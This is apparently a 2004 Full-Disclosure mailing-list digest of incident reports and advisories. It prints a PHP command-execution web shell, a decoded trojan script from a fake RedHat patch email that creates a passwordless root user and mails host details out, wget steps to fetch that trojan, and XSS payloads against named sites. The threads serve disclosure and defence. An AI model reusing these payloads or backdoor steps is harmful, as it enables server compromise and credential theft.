was in italian language (cause compromised server is .it), in this case is
in english language.
The hacker launched WGET command to retrieve his hacking tool in /tmp/a.out
In this log you can see also that the hacker also try to execute some "ls"
command,
as first trial to test vulnerability I suppose.
Moved by this, after other analysis I found that vulnerability used is an
obvious-but-effective PHP-Injection
using global variables (http://www.securityfocus.com/archive/1/218000 is a
good page to learn
something about this vuln).

The hacker page used to accomplish the injection are based on this
test-page, taken directly on the hacker-site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojan/backdoor/shell/worm/exploit and
other malware....why is it still open?

http://xpire.info/cli.gz // connect back shell
http://xpire.info/fa/aga.exe // agobot family
http://xpire.info/install.gz // some trojan/malware ???? my NortonAV
does not catch it; it's a Windows-EXE

This is the sample of PHP-Injection page:
<?
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Using PHP "system" call, it possible to execute any remote command, like
WGET for example.
Anyone knows before this page???

> I assume you used a bootable CD on the infected machine to do the
checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely,
using SSH, so I cannot use a bootable CD to connect at this remote host very
far from me :)
I'm limited in the analysis.....but the host is not mine!
However I think that md5um give me good results, because I compared all the
/usr/sbin directory
and all the checksum were good, except for /usr/sbin/crond......any ideas???
I used also "rpm -Vf" utility to cross check results, and were the same of
md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded. It's also
> possilble, but less likely, that the injection is done in a kernel
> module.
It's my fear :(((((((((( I studied all *.conf related to Apache/PHP modules
of this
machine, but nothing was found. A LKM injected could be the only response.

I also ran "chkrootkit" as someone suggest to me, but all the test give
positive answer
(no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity will begin :))))))

Thank you for the help, Kevin.

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-23 ] Gaim: Multiple vulnerabilities

From: Matthias Geerdsen (vorlongentoo.org)
Date: Sun Oct 24 2004 - 14:11:17 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Gaim: Multiple vulnerabilities
      Date: October 24, 2004
      Bugs: #68271
        ID: 200410-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Gaim which could allow a
remote attacker to crash the application, or possibly execute
arbitrary code.

Background
==========

Gaim is a full featured instant messaging client which handls a variety
of instant messaging protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-im/gaim < 1.0.2 >= 1.0.2

Description
===========

A possible buffer overflow exists in the code processing MSN SLP
messages (CAN-2004-0891). memcpy() was used without validating the size
of the buffer, and an incorrect buffer was used as destination under
certain circumstances. Additionally, memory allocation problems were
found in the processing of MSN SLP messages and the receiving of files.
These issues could lead Gaim to try to allocate more memory than
available, resulting in the crash of the application.

Impact
======

A remote attacker could crash Gaim and possibly execute arbitrary code
by exploiting the buffer overflow.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Gaim users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-im/gaim-1.0.2"
    # emerge ">=net-im/gaim-1.0.2"

References
==========

  [ 1 ] CAN-2004-0891
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0891
  [ 2 ] Gaim Security Issues
        http://gaim.sourceforge.net/security/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)

From: Martin (broadcastptraced.net)
Date: Sun Oct 24 2004 - 16:09:05 CDT

Advisory attached.

Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)

Martin (broadcastptraced.net)

-------------------
Program Description
-------------------

"Thunderbird, our latest email program, includes intelligent spam
filters, spell-checking, security, customization, and newsgroups
support."

www.mozilla.org

-------------------
Problem Description
-------------------

When opening an attachment, or a link included in an email, Thunderbird
prompts the user with a dialog box, giving the choice to "Save to Disk"
or to "Open with" <default program>.

For example, we receive a PDF document attached, and on the Attachments
section, we choose "Open".

broadcast:/tmp$ ls -l *.pdf
-rw------- 1 broadcast broadcast 2002560 2004-10-24 18:38 wskbq43m.pdf

While the dialog box is still open, the file permissions are OK, and the
filename is random (except for the extension).
If we choose to save it to disk, and check /tmp again:

broadcast:/tmp$ ls -l *.pdf
ls: *.pdf: No such file or directory

Great, it's gone. Now let's choose to open it with the default viewer
(in my case, xpdf).
Again, while the dialog box is open, there are no apparent problems.

broadcast:/tmp$ ls -l *.pdf
-rw------- 1 broadcast broadcast 2002560 2004-10-24 18:42 hp1h30si.pd

But after choosing to open it with xpdf:

broadcast:/tmp$ ls -l *.pdf
-rw-r--r-- 1 broadcast broadcast 2002560 2004-10-24 18:42 programming.pdf

The file becomes world readable, until the user closes xpdf, or whatever
application he chose to read the attachment.
Also, the filename becomes predictable, but if the filename already
exists on /tmp, Thunderbird will choose a similar filename, and won't
work on the existing one.

This exact issue affects Mozilla Firefox 0.9.3. I haven't tested
older/newer versions, and all of this was tested under Debian Unstable.

A copy of this advisory and future updates on this issue may be found on:
http://broadcast.ptraced.net/advisories/008-firefox.thunderbird.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Help, possible rootkit

From: RandallM (randallmfidmail.com)
Date: Sun Oct 24 2004 - 16:41:21 CDT

Billy said:

--__--__--

Message: 1
From: "BillyBob" <billybobknobhotmail.com>
To: "Full Disclosure" <full-disclosurelists.netsys.com>
Date: Sat, 23 Oct 2004 13:05:29 -0300
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

-- -- --
 __ __

Billy,
1. Go directly to safe-mode
2. go to regedit and check start up processes in computer and user and
research each unfamiliar
3. run hijack this program
4. run spybot
5. upon start up use tcp-view and process viewer from sysinteral.com to see
connections

One person made mention of this once when I had this problem on a sales
laptop:

"If you have scripting enabled, it is possible that one of them is doing
this in the background. Scripts can remain active after you have left
the page that started them.

Some PC programmers tend to use "busy waits" instead of calling a
sleep() or hibernate() function. This tends to kill performance on
multiuser systems."

Optical mice also don't work well with certain colored pads and such. Make
sure you try
A different surface.

Also of course clean the area very well. A piece of hair can cause problems.

Just some quick thoughts
 

thank you
Randall M
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] XSS vulnerabilities in several german communities + aol search

From: Habonator _ (habonatorgmail.com)
Date: Sun Oct 24 2004 - 16:59:26 CDT

I've discovered XSS bugs in several big german communities.
All these communities use a cookie based authentification so its
possible to inject script code to steal users cookies.

All vendors have been informed.

1. giga.de - NBC GIGA Community
*************
Affected:
Whole Comment-System

Example:
http://www.giga.de/news/comments/index.php?id=XXXXXX&newstypid=XXXXX"><script>alert("foo");</script><form%20"

2. pcwelt.de - Community of the PC-WELT - Magazine
*************
Affected:
Search

Example:
http://www.pcwelt.de/index.cfm?pid=XXX&stichwort=<script>alert("foo");</script>

3. autoscout24.de - online car market
*************
Affected:
All offering sites

Example:
http://www.autoscout24.de/home/index/detail.asp?ts=XXXXXXX"><script>alert("foo");</script><form%20"&source=topcar&id=XXXXXXXXXXX

Last but not least, not a community but a funny one:
http://suche.aol.de/suche/search.jsp?q=%3Cscript%3Ealert%28%27foo%27%29%3B%3C%2Fscript%3E&wo=

**************************
Discovered by "Habonator"
At home at http://www.hackerboard.de
Hi to tripbit.
**************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Any update on SSH brute force attempts?

From: Jay Libove (libovefelines.org)
Date: Sun Oct 24 2004 - 17:11:04 CDT

Hi Miriam -

I have not attempted any type of automated blocking, as the attack profile
appears to not present a threat to systems with reasonably good passwords.
(I'm being a little lax about this, I realize).

What I have seen, in terms of the sources, intensity, and frequency of the
attempts, matches what you reported - where the attempts come from varies
every time, the number of different accounts that each attempt goes after
varies greatly, and while I may see attempts from two different source IP
addresses on one night, it may then be several days before I see any other
attempts at all.

I therefore agree that it does not appear to be any kind of widespread
worm/virus, but instead manually launched. I guess that the targeting
(what IP address[es] the attempts are made against) is random.

Thanks
-Jay

> Message: 17
> Date: Sun, 24 Oct 2004 09:43:17 +0800
> From: Miriam Chan <miriamchangeocities.com>
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Re: Any update on SSH brute force attempts?
>
> Jay Libove wrote:
> > Recently, a couple of times a week, I see repeats of this which now have
> > as many as fifty different accounts being attacked. (Almost none of which
> > exist on my server, and none of which will have common passwords
> > thankyouverymuch).
>
> By the way, I started to suspect that the attacks were intentional (not just
> some games by some script kiddies.) I had some servers accepting SSH
> connections from anywhere (this is for easy access, and I know it is not
> a very good idea.)
>
> Before I set up a Portsentry-like mechanism to block the bad hosts, I got at
> least 5-6 attempts per day. Afterward, I got nearly none (just some 1-2
> attempts a day.) The change looks simply too much for me. If I got some
> number of attacks a day, I would expect the same number of attacks the next
> day if the attackes were automatically done by some virus/worms. I wished that
> it was done by some virus, because (I think) a virus is not more malicious
> than a planned cracking behaviour.
>
> Do anyone have the same observations as me ? It should be great if you saw
> it and shared your ideas.
>
> Miriam.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Hugo van der Kooij (hvdkooijvanderkooij.org)
Date: Sun Oct 24 2004 - 17:59:18 CDT

-----BEGIN PGP SIGNED MESSAGE-----

Be advised.

The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.

Message was send from 'University of Texas at Arlington'.

I am sure none of you should be fooled by such a message but other might
be.

And while it lasts you may want to get the file for your own educational
purposes.

Hugo.
- ---------- Forwarded message ----------
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <securityredhat.com>
To: *****************
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"

[logo_rh_home.png]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:

 * First download the patch from the Security RedHat mirror: wget
    www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 * cd fileutils-1.0.6.patch
 * make
 * ./inst

Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright (C) 2004 Red Hat, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sun Oct 24 2004 - 18:24:47 CDT

Elia Florio wrote:

> > I'm not sure that qmail-inject isn't a red herring? The actual
> > download looks like 'wget' was used.
> Good suggestion, my friend :)
>
> It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.

More specifically, from the strings in the binary it looks awfully like
sd's bindtty -- try Googling for "bindtty.c"...

The possible bad news is that bindtty is used in the suckit rootkit, so
your remote-only access may cause major (if not insurmountable)
problems to doing a half-useful diagnosis...

<<big snip>>
> The hacker page used to accomplish the injection are based on this
> test-page, taken directly on the hacker-site :-)
>
> http://xpire.info/s/2
> http://xpire.info/s/
>
> I notice that this site is full of trojan/backdoor/shell/worm/exploit and
> other malware....why is it still open?

You'd be surprised how few folk actually compain about a lot of these
sites. Compound that with the rate of incompetence at many small (and
even many not-so-small) ISPs, where the very thin margins mean they
don't have time (and seldom good enough staff anyway) to analyse such
complaints, and where the emphasis is often more on making sure they
get their $10, $20, $40, etc this month from that customer, and many
such sites stay up way too long. The way to break such sites is for
some "authority" to contact them (a CERT, law enforcement, etc) or
"enough" polite, professional, clearly technically competent but not
overly technical complaints explaining what the site is being used for
and why it should be shut down. Of course, often the "base" sites are
themselves simply just ill-maintained systems that have, themselves,
been hacked and if all the ISP is up to doing is closing the apparently
rogue site/account, or simply removing the "offending content" the site
(and others similarly hosted on the still badly maintained servers)
remains open to further, similar abuse.

Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Harry Hoffman (hhoffmanip-solutions.net)
Date: Sun Oct 24 2004 - 18:51:09 CDT

haha, that's pretty funny. If they were going to do something like that
it should have at least been in a rpm format.

I'm hoping that this doesn't need to be said but if neither
"yum check-update || up2date -l" report anything then chances are there
are no "Official Fedora Updates"

--Harry

Hugo van der Kooij wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Be advised.
>
> The message below is currently going around on internet. Being unsinged
> was the fist obvious issue. Not pointing to RPM updates, being in a
> different format and such were among the other reasong to suspect it.
>
> Message was send from 'University of Texas at Arlington'.
>
> I am sure none of you should be fooled by such a message but other might
> be.
>
> And while it lasts you may want to get the file for your own educational
> purposes.
>
> Hugo.
> - ---------- Forwarded message ----------
> Date: Sun, 24 Oct 2004 17:22:20 -0500
> From: RedHat Security Team <securityredhat.com>
> To: *****************
> Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
>
>
> [logo_rh_home.png]
>
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: RedHat
>
> A complete revision history is at the end of this file.
>
> Dear RedHat user,
>
> Redhat found a vulnerability in fileutils (ls and mkdir), that could
> allow a remote attacker to execute arbitrary code with root privileges.
> Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
> RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
> known that *BSD and Solaris platforms are NOT affected.
>
> The RedHat Security Team strongly advises you to immediately apply the
> fileutils-1.0.6 patch. This is a critical-critical update that you must
> make by following these steps:
>
> * First download the patch from the Security RedHat mirror: wget
> www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> * cd fileutils-1.0.6.patch
> * make
> * ./inst
>
> Again, please apply this patch as soon as possible or you risk your
> system and others` to be compromised.
>
> Thank you for your prompt attention to this serious matter,
>
> RedHat Security Team.
>
> Copyright (C) 2004 Red Hat, Inc. All rights reserved.
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.3 (GNU/Linux)
>
> iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
> OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
> H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
> fcdKycT5D9E=
> =/nEk
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Crypto and Primes

From: Janusz A. Urbanowicz (alexbofh.net.pl)
Date: Sun Oct 24 2004 - 19:46:47 CDT

On Fri, Oct 22, 2004 at 02:31:28PM -0700, Daniel Sichel wrote:
> Depending on how rigourous you are being, the large in large numbers is
> a relative term. I know from talking to someone who has worked in for
> real government crypto that there is enough storage space to create a
> lookup db of a good chunk (if not all) of the PGP crypto keys in use for
> common key sizes (512 and 1024). I doubt SSL is less vulnerable. I guess
> there's force, brute force, and brute force with taxpayer dollars.

This is disinfo, or, misunderstanding. Some sources DO report existence of
such lookup tables used for DES, and this could be extended to other
ciphers, like meet-in-the-middle lookup tables for 3DES. But as others
pointed, for primes, this would be... unwieldy.

Alex
--
0x46399138

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Janusz A. Urbanowicz (alexbofh.net.pl)
Date: Sun Oct 24 2004 - 19:41:15 CDT

On Fri, Oct 22, 2004 at 04:30:36PM -0600, twebsterdaksoft.com wrote:
> openssl encryption and decryption,
>
> encrypt
> openssl enc <cipher> -e -in filename.txt -out filename.enc
> openssl enc -aes-256-cfb -e -in filename.txt -out filename.enc
>
>
> decrypt
> openssl enc <cipher> -d -in filename.enc -out filename.txt
> openssl enc -aes-256-cfb -d -in filename.enc -out filename.txt

it is still better use gpg in -c mode as it does proper key hashing from
passphrase

a
--
0x46399138

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Andrew Farmer (andfarmteknovis.com)
Date: Sun Oct 24 2004 - 20:18:41 CDT

Hugo van der Kooij wrote:
> Be advised.
> The message below is currently going around on internet. Being unsinged
> was the fist obvious issue. Not pointing to RPM updates, being in a
> different format and such were among the other reasong to suspect it.
> Message was send from 'University of Texas at Arlington'.
> I am sure none of you should be fooled by such a message but other
> might
> be.
> And while it lasts you may want to get the file for your own
> educational
> purposes.
<snip>

I did a quickie analysis of the program (which is basically just
distributed as source!).

Strings are encrypted with arcfour; however, as the keys are included
too, decrypting them is no problem.

pswd[] is an initialization vector for arcfour.

shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR

opts[], text[], and chk2[] are encrypted with some (apparently
constant) data retrieved by statting /bin/sh.

To cut to the chase, the whole thing ends up clearing the screen and
running the following shell script:

> #!/bin/sh
> cd /tmp/
> clear
> if [ `id -u` != "0" ]
> then
> echo "This patch must be applied as \"root\", and you are:
> \"`whoami`\""
> exit
> fi
> echo "Identifying the system. This may take up to 2 minutes. Please
> wait ..."
> sleep 3
> if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
> echo "Inca un root frate belea: " >> /tmp/mama
> adduser -g 0 -u 0 -o bash >> /tmp/mama
> passwd -d bash >> /tmp/mama
> ifconfig >> /tmp/mama
> uname -a >> /tmp/mama
> uptime >> /tmp/mama
> sshd >> /tmp/mama
> echo "user bash stii tu" >> /tmp/mama
> cat /tmp/mama | mail -s "Inca o roata" rootaddlebrain.com >>
> /dev/null
> rm -rf /tmp/mama
> mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
> fi
>
> bla()
> {
> sleep 2
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 2
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 3
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 4
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo "#"
> sleep 1
> }
>
> echo "System looks OK. Proceeding to next step."
> sleep 1
> echo
> echo -n "Patching \"ls\": "
> bla
> echo -n "Patching \"mkdir\": "
> bla
> echo
> echo "System updated and secured successfuly. You may erase these
> files."
> sleep 1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBfFRxPa6RRaKl0ScRAunHAKC0vRGXCYxviDPA4OxIL9f1Kq1kiQCcDZpK
InTx2SYpJOGhQxE17Nf4WZg=
=jaVu
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] python does mangleme (with IE bugs!)

From: Berend-Jan Wever (skylinededup.tudelft.nl)
Date: Sun Oct 24 2004 - 20:55:10 CDT

Hi all, here's my analysis of these bugs:

2445.html does nothing on my win2ksp4en/ie6.0sp1. (IE does crash when you load it because the META refresh tag leads to 2446.html.)
2446.html contains an exploitable BoF in the IFRAME tag using the SRC and NAME property. To trigger the BoF you only need this tag in a HTML file:
<IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">

Exactly why or how it happens, I do not know yet. I do know you can control EAX, after which this gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
7178EC04 68 847B7071 PUSH SHDOCVW.71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Control over EAX leads to control over ECX, which you can use to control EIP: Remote Command Execution.

They'd better patch this one quickly, a reliable working exploit shouldn't take more then a day to code.

Cheers,
SkyLined

----- Original Message -----
From: "ned" <ndfelinemenace.org>
To: <bugtraqsecurityfocus.com>
Cc: <full-disclosurelists.netsys.com>; <lcamtufghettot.org>
Sent: Sunday, October 24, 2004 06:36
Subject: [Full-Disclosure] python does mangleme (with IE bugs!)

> i've made a port of mangleme:
> http://felinemenace.org/~nd/htmler.py
> with a few extra quirks (such as file extentions/url types)
>
> it finds IE bugs after roughly 2.5 -> 3 hours and they are at:
> http://felinemenace.org/~nd/crash_ie/
>
> They are not the null pointer dereference that Michal found (which
> curiously seems to not own my 6.0.2800.1106.xpsp1?) but some other
> probably non-exploitable problems!
>
> htmler.py doesn't use CGI like mangleme but generates webpages in the
> directory 'html1' numbered 0.html to n.html. 0.html then uses a refresh to
> load 1.html and so on with little user interaction required!
>
> anyway, if you find bugs with it, don't sell to anyone/notify vendors!
> - nd
>
> --
> http://felinemenace.org/~nd - "eat a duck"
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Windows Time Synchronization - Best Practices

From: Gary E. Miller (gemrellim.com)
Date: Sun Oct 24 2004 - 20:48:07 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yo Michael!

On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:

> You can certainly have multiple time servers specified with Windows
> Time Service (SNTP). RTM. It has the ability to failover through a
> list.

Yes you can have multiple time servers, but only one active at a time.
With NTP your client polls a number of diverse servers. Routes can
flap, servers can go wacko, but your time stays solid.

> If you need the full features of NTP, by all means use a third party
> daemon. However, in keeping my routers, RADIUS, and Kerberos sync'd
> properly - I have yet to require anything that SNTP is unable to
> provide.

So I agree it is not always required, but when those devices support
native SNTP why not use the best?

A lot of services are dependent on linear time. NTP will usually slew
the local host time to the correct value, SNTP will in usually jump
time to the correct value. This can cause things like cron daemons
to miss scheduled events. I have seen this cause problems.

BTW, A Cisco router makes a dandy low-latency local NTP time server.

> I've never heard of time.microsoft.com, and have never seen any
> indication in any documentation to ever suggest using it. MS's docs
> have always suggested US naval observatory sites (since the
> documentation is US-based).

Just read all the w32time KB articles and the only time server
mentioned with a FQDN is time.miscrosoft.com.

Even the usno NTP has gone bonkers. Not dead, bonkers. So failover
never occured. Folks that synced to it and other servers with NTP
had no issues. Those that used it solely were SOL.

> I missed something. Why would the requester time sync to Seattle, WA
> USA if they are in Brazil? That certainly goes against NTP RFC's,
> regardless of any suggestions of the use of time.microsoft.com.

Cause that is the only time server mentioned by FQDN in the M$ KB.

> I have used 3rd party daemons as well as the built-in SNTP. Both work
> equally well. The built-in tools can work just fine if you understand
> the components and know how to properly use them. There is more
> functionality available than what is simply represented by NET TIME.
> Again, its a matter of RTM.

Well, I RTM the SNTP RFC and it says only to use STNP on local nets at
the end nodes. YMMV.

RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
        gemrellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFBfFtb8KZibdeR3qURAje4AKDM9zApW/whinZS1TXtMQxyUOUtIgCgzO0X
ujUs6Je71jrYa/PmyTmvuTo=
=88X7
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] STG Security Advisory: [SSA-20041022-08] MoniWiki XSS vulnerability

From: SSR Team (advisorystgsecurity.com)
Date: Sun Oct 24 2004 - 21:02:20 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041022-08] MoniWiki XSS vulnerability

Revision 1.0
Date Published: 2004-10-22 (KST)
Last Update: 2004-10-22
Disclosed by SSR Team (advisorystgsecurity.com)

Summary
========
MoniWiki is a wiki web application used by many Korean Linux users.

It has a cross site scripting vulnerability.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Details
=======
Due to an input validation flaw, the MoniWiki is vulnerable to cross site
scripting attacks.

http://[victim]/wiki.php/<script>alert("XSS Vulnerability exists")</script>

Impact
======
Medium: Malicious attackers can inject and execute arbitrary script code in
a user's browser session in context of an affected site.

Solution
=========
Update to MoniWiki 1.0.9

Affected Products
================
MoniWiki 1.0.8 and prior

Vendor Status: FIXED
=======================
2004-09-30 Vulnerability found.
2004-09-30 MoniWiki developer notified.
2004-10-21 MoniWiki 1.0.9 released.
2004-10-22 Official release.

Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQXxefj9dVHd/hpsuEQLNNwCgnNhdf+5DXwhtrr4FpAl1Tvij2s0AoJT6
YFdZvyM83JtcuhyElHRR+Eii
=Sf9j
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] STG Security Advisory: [SSA-20041022-08] MoniWiki XSS vulnerability

From: SSR Team (advisorystgsecurity.com)
Date: Sun Oct 24 2004 - 20:56:55 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041022-08] MoniWiki XSS vulnerability

Revision 1.0
Date Published: 2004-10-22 (KST)
Last Update: 2004-10-22
Disclosed by SSR Team (advisorystgsecurity.com)

Summary
========
MoniWiki is a wiki web application used by many Korean Linux users.

It has a cross site scripting vulnerability.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Details
=======
Due to an input validation flaw, the MoniWiki is vulnerable to cross site
scripting attacks.

http://[victim]/wiki.php/<script>alert("XSS Vulnerability exists")</script>

Impact
======
Medium: Malicious attackers can inject and execute arbitrary script code in
a user's browser session in context of an affected site.

Solution
=========
Update to MoniWiki 1.0.9

Affected Products
================
MoniWiki 1.0.8 and prior

Vendor Status: FIXED
=======================
2004-09-30 Vulnerability found.
2004-09-30 MoniWiki developer notified.
2004-10-21 MoniWiki 1.0.9 released.
2004-10-22 Official release.

Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQXxdRT9dVHd/hpsuEQJeRACdFIt3UQJuAEqV52j30WIoX2HsRVUAoOf0
2xkoeV06zVCaShupwVhgNGxD
=Ns3M
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

From: Kyle Maxwell (krmaxwellgmail.com)
Date: Sun Oct 24 2004 - 22:30:13 CDT

On Fri, 22 Oct 2004 14:50:23 +0100, Airey, John <john.aireyrnib.org.uk> wrote:
> > -----Original Message-----
> > From: Kyle Maxwell [mailto:krmaxwellgmail.com ]
> > I think you may mean something slightly differently; given any large
